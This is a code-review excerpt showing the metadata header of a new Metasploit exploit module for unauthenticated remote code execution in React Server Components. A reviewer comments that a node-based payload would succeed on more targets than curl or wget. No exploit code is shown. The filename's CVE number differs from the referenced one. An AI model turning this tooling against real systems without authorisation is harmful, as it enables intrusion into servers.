modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55102.rb

```diff
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Unauthenticated RCE in React and Next.js',
+        'Description' => %q{
+          A critical unauthenticated Remote Code Execution (RCE) vulnerability exists in React Server
+          Components (RSC) Flight protocol. The vulnerability allows attackers to achieve prototype
+          pollution during deserialization of RSC payloads by sending specially crafted multipart
+          requests with "__proto__", "constructor", or "prototype" as module names.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Maksim Rogov', # Metasploit Module
+          'Lachlan Davidson', # Vulnerability Discovery
+          'maple3142' # Public Exploit
+        ],
+        'References' => [
+          ['CVE', '2025-55182'],
+          ['CVE', '2025-66478'],
+          ['URL', 'https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components'],
+          ['URL', 'https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3']
+        ],
+        'Platform' => ['multi'],
+        'Arch' => [ARCH_CMD],
```

Comment:
Would it make sense to default to a `node` based payload for the highest chance of success on arbitrary targets? 🤔 

i.e. we won't know if the target has `curl` or `wget` - but I imagine it'll have `node` on the path by default? 👀